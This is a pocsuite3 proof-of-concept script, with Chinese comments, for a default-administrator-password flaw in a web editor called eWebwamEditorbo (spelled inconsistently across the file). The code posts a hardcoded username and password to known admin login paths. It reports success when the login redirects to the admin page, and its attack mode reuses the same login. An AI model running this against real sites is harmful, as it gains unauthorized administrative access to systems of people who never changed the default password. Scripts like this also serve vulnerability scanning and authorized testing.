eWebwamEditorbo 弱密码漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1090' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-10-21' createDate = '2013-10-22' updateDate = '2013-10-22' references = ['http://t.qq.com/p/t/190391036131290'] name = 'eWebwamEditorbo默认管理帐号 Poc' appPowerLink = '' appName = 'eWebwamEditorbo' appVersion = '#' vulType = 'Weak Password' desc = ''' eWebwamEditorbo存在默认用户名和密码adwanminbo/editorwaneboweb， 如果安装时没有更改密码，则可以通过默认帐号进入eWebeditor后台 ''' samples = [] install_requires = [''] def _verify(self): result = {} headers = {} headers['Content-Type'] = 'application/x-www-form-urlencoded' paths = { '/eWebwanEditorbo/admin/login.aspx': '/eWebwanEditorbo/admin/login.aspx?action=login'} # 现在已知的后台路径,键为登录地址,值为post地址 accounts = {'adwanminbo': 'editorwaneboweb'} # 这里可以继续添加用户名和密码，其中键值为用户名、值为密码 for path in paths.items(): for account in accounts.items(): headers['Origin'] = self.url headers['Referer'] = self.url + path[1] value = 'usr=%s&pwd=%s' % (account[0], account[1]) r = requests.post(self.url + path[1], data=value, headers=headers, allow_redirects=False) if r.status_code == 302: if '/eWebwanEditorbo/admin/default.aspx' in r.text: result['AdminInfo'] = {} result['AdminInfo']['adminpath'] = self.url + path[1] result['AdminInfo']['adminname'] = account[0] result['AdminInfo']['adminpass'] = account[1] break return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)